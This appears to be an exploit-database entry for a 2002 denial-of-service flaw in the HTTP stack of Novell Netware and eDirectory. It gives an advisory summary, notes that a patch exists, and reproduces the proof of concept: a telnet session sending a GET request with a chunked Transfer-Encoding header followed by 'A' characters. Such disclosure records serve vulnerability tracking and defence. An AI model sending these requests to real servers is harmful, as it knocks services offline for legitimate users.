header-logo
Suggest Exploit
vendor:
Netware and eDirectory
by:
SecurityFocus
5
CVSS
MEDIUM
HTTP Stack Denial of Service
400
CWE
Product Name: Netware and eDirectory
Affected Version From: Novell Netware and eDirectory
Affected Version To: Novell Netware and eDirectory
Patch Exists: YES
Related CWE: CVE-2002-0647
CPE: o:novell:netware
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

HTTP Stack Denial of Service

An attacker can cause a denial of service to legitimate users of the HTTP service by sending a malformed packet containing an invalid Transfer-Encoding header. This can be done by using telnet to connect to the target server on port 80 and sending a GET request with the Transfer-Encoding header set to "Chunked" followed by a string of "A" characters.

Mitigation:

Novell has released a patch to address this issue.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7841/info

It has been reported that the HTTP Stack distributed with Novell Netware and eDirectory does not properly handle some types of malformed packets. Because of this, an attacker may be able to cause a denial of service to legitimate users of the HTTP service. 

# telnet www.example.com 80

GET /anthinh HTTP/1.1 (Hit Enter)
Host: ip address (Hit enter)
Transfer-Encoding:Chunked (Enter)
(Enter)
AAAAAAAA
(Enter)
(Enter)

Navigation

Suggest Exploit

Services By CQR